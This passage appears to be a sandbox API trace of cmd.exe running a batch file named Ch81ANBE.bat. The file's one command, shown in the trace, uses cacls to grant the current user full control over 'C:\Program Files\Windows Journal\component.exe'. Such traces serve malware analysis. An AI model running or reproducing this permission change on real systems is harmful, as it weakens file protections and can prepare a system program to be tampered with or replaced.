Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0185.181] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0185.181] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0185.181] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0185.181] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0185.181] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0185.181] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0185.181] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0185.181] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.182] GetProcessHeap () returned 0x650000 [0185.182] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20c) returned 0x662f28 [0185.182] GetConsoleTitleW (in: lpConsoleTitle=0x662f28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.183] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.183] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0185.183] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0185.183] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0185.184] GetProcessHeap () returned 0x650000 [0185.184] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x666ad0 [0185.184] GetProcessHeap () returned 0x650000 [0185.184] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x666ad0 | out: hHeap=0x650000) returned 1 [0185.188] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0185.188] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0185.188] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0185.188] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0185.188] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0185.188] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0185.188] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0185.188] GetProcessHeap () returned 0x650000 [0185.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x58) returned 0x663140 [0185.188] GetProcessHeap () returned 0x650000 [0185.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x72) returned 0x672b20 [0185.190] GetProcessHeap () returned 0x650000 [0185.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6c) returned 0x6631a0 [0185.192] GetConsoleTitleW (in: lpConsoleTitle=0x2ef318, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.853] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0185.853] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0185.853] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0185.853] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0185.853] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0185.854] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0185.854] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0185.854] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0185.854] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0185.854] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0185.854] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0185.854] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0185.854] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0185.854] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0185.854] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0185.854] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0185.854] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0185.854] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0185.854] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0185.854] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0185.854] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0185.854] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0185.854] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0185.854] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0185.854] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0185.854] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0185.854] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0185.855] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0185.855] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0185.855] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0185.855] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0185.855] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0185.855] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0185.855] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0185.855] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0185.855] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0185.855] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0185.855] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0185.855] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0185.855] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0185.855] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0185.855] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0185.855] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0185.855] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0185.855] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0185.855] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0185.855] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0185.856] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0185.856] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0185.856] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0185.856] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0185.856] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0185.856] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0185.856] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0185.856] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0185.856] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0185.856] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0185.856] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0185.856] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0185.856] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0185.856] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0185.856] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0185.856] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0185.856] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0185.856] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0185.857] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0185.857] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0185.857] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0185.857] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0185.857] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0185.857] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0185.857] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0185.857] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0185.857] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0185.857] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0185.857] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0185.857] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0185.857] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0185.857] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0185.857] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0185.857] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0185.858] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0185.858] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0185.858] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0185.858] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0185.858] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0185.858] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0185.858] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0185.858] GetProcessHeap () returned 0x650000 [0185.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x663218 [0185.858] GetProcessHeap () returned 0x650000 [0185.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xd6) returned 0x663430 [0185.861] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0185.861] GetProcessHeap () returned 0x650000 [0185.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x418) returned 0x6507f0 [0185.861] SetErrorMode (uMode=0x0) returned 0x0 [0185.862] SetErrorMode (uMode=0x1) returned 0x0 [0185.862] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x6507f8, lpFilePart=0x2eee38 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2eee38*="Desktop") returned 0x25 [0185.862] SetErrorMode (uMode=0x0) returned 0x1 [0185.862] GetProcessHeap () returned 0x650000 [0185.862] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6507f0, Size=0x6e) returned 0x6507f0 [0185.862] GetProcessHeap () returned 0x650000 [0185.862] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x6507f0) returned 0x6e [0185.862] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0185.862] GetProcessHeap () returned 0x650000 [0185.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x5a) returned 0x663510 [0185.862] GetProcessHeap () returned 0x650000 [0185.862] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa8) returned 0x663578 [0185.862] GetProcessHeap () returned 0x650000 [0185.862] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x663578, Size=0x5a) returned 0x663578 [0185.862] GetProcessHeap () returned 0x650000 [0185.862] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x663578) returned 0x5a [0185.862] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.863] GetProcessHeap () returned 0x650000 [0185.863] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe0) returned 0x650868 [0185.869] GetProcessHeap () returned 0x650000 [0185.869] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x650868, Size=0x76) returned 0x650868 [0185.869] GetProcessHeap () returned 0x650000 [0185.869] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x650868) returned 0x76 [0185.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.869] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x2eebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eebd4) returned 0x6635e0 [0185.870] GetProcessHeap () returned 0x650000 [0185.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6617f0 [0185.870] FindClose (in: hFindFile=0x6635e0 | out: hFindFile=0x6635e0) returned 1 [0185.870] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0185.870] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0185.870] GetConsoleTitleW (in: lpConsoleTitle=0x2ef0ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.870] GetProcessHeap () returned 0x650000 [0185.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x11c) returned 0x6508e8 [0185.871] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0185.871] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0185.871] IdentifyCodeAuthzLevelW () returned 0x1 [0185.879] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0185.879] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0185.879] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0185.879] CloseCodeAuthzLevel () returned 0x1 [0185.879] SetErrorMode (uMode=0x0) returned 0x0 [0185.879] SetErrorMode (uMode=0x1) returned 0x0 [0185.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x663220, lpFilePart=0x2eef98 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2eef98*="Ch81ANBE.bat") returned 0x32 [0185.879] SetErrorMode (uMode=0x0) returned 0x1 [0185.879] GetProcessHeap () returned 0x650000 [0185.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x72) returned 0x672ba0 [0185.879] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\component.exe\"", _Control=" \x09") returned 0x1 [0185.880] GetProcessHeap () returned 0x650000 [0185.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x6a) returned 0x651140 [0185.880] GetProcessHeap () returned 0x650000 [0185.880] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xcc) returned 0x6511b8 [0185.880] GetProcessHeap () returned 0x650000 [0185.880] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6511b8, Size=0x6c) returned 0x6511b8 [0185.880] GetProcessHeap () returned 0x650000 [0185.880] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x6511b8) returned 0x6c [0185.880] CmdBatNotification () returned 0x663282 [0185.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2eefdc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0185.881] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0185.881] _get_osfhandle (_FileHandle=3) returned 0x78 [0185.881] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] _get_osfhandle (_FileHandle=3) returned 0x78 [0185.881] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.881] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2eefc0, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2eefc0*=0xe2, lpOverlapped=0x0) returned 1 [0185.882] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0185.882] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0185.883] _get_osfhandle (_FileHandle=3) returned 0x78 [0185.884] GetFileType (hFile=0x78) returned 0x1 [0185.884] _get_osfhandle (_FileHandle=3) returned 0x78 [0185.884] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0185.884] GetProcessHeap () returned 0x650000 [0185.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x666ad0 [0185.884] GetProcessHeap () returned 0x650000 [0185.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4008) returned 0x674b08 [0185.884] GetProcessHeap () returned 0x650000 [0185.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1a) returned 0x665820 [0185.884] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0185.884] GetProcessHeap () returned 0x650000 [0185.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x665820 | out: hHeap=0x650000) returned 1 [0185.884] GetProcessHeap () returned 0x650000 [0185.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x674b08 | out: hHeap=0x650000) returned 1 [0185.885] GetProcessHeap () returned 0x650000 [0185.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x666ad0 | out: hHeap=0x650000) returned 1 [0185.885] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0185.885] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0185.885] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0185.885] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0185.885] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0185.885] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0185.885] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0185.885] GetProcessHeap () returned 0x650000 [0185.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x58) returned 0x651230 [0185.885] GetProcessHeap () returned 0x650000 [0185.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x14) returned 0x650ab8 [0186.632] GetProcessHeap () returned 0x650000 [0186.632] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xac) returned 0x664170 [0186.633] _tell (_FileHandle=3) returned 32 [0186.633] _close (_FileHandle=3) returned 0 [0186.633] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eed94 | out: _Buffer="\r\n") returned 2 [0186.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.634] GetFileType (hFile=0x7) returned 0x2 [0186.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0186.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed54 | out: lpMode=0x2eed54) returned 1 [0186.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.635] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eed80, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eed80*=0x2) returned 1 [0186.636] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0186.636] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0186.636] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eed90 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0186.637] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eed90 | out: _Buffer=">") returned 1 [0186.637] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.637] GetFileType (hFile=0x7) returned 0x2 [0186.637] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0186.638] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eed58 | out: lpMode=0x2eed58) returned 1 [0186.638] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.638] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eed84, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eed84*=0x26) returned 1 [0186.639] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.639] GetFileType (hFile=0x7) returned 0x2 [0186.640] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0186.640] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefdc | out: lpMode=0x2eefdc) returned 1 [0186.640] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.640] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x650ac0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ef008, lpReserved=0x0 | out: lpBuffer=0x650ac0*, lpNumberOfCharsWritten=0x2ef008*=0x5) returned 1 [0186.641] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef014 | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\component.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 82 [0186.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.641] GetFileType (hFile=0x7) returned 0x2 [0186.642] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0186.642] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eefd4 | out: lpMode=0x2eefd4) returned 1 [0186.642] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.642] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0x2ef000, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef000*=0x52) returned 1 [0186.643] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef034 | out: _Buffer="\r\n") returned 2 [0186.643] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.643] GetFileType (hFile=0x7) returned 0x2 [0186.643] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0186.643] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eeff4 | out: lpMode=0x2eeff4) returned 1 [0186.644] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.644] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef020, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef020*=0x2) returned 1 [0186.644] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0186.644] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0186.644] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0186.645] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0186.645] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0186.645] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0186.645] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0186.645] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0186.645] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0186.645] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0186.645] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0186.645] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0186.645] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0186.645] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0186.645] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0186.645] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0186.645] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0186.645] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0186.646] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0186.646] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0186.646] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0186.646] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0186.646] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0186.646] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0186.646] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0186.646] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0186.646] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0186.646] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0186.646] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0186.646] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0186.646] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0186.646] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0186.646] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0186.646] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0186.647] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0186.647] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0186.647] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0186.647] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0186.647] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0186.647] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0186.647] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0186.647] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0186.647] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.647] GetProcessHeap () returned 0x650000 [0186.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x418) returned 0x664228 [0186.647] SetErrorMode (uMode=0x0) returned 0x0 [0186.648] SetErrorMode (uMode=0x1) returned 0x0 [0186.648] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x664230, lpFilePart=0x2eedd8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2eedd8*="Desktop") returned 0x25 [0186.648] SetErrorMode (uMode=0x0) returned 0x1 [0186.648] GetProcessHeap () returned 0x650000 [0186.648] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x664228, Size=0x60) returned 0x664228 [0186.648] GetProcessHeap () returned 0x650000 [0186.648] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x664228) returned 0x60 [0186.648] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: 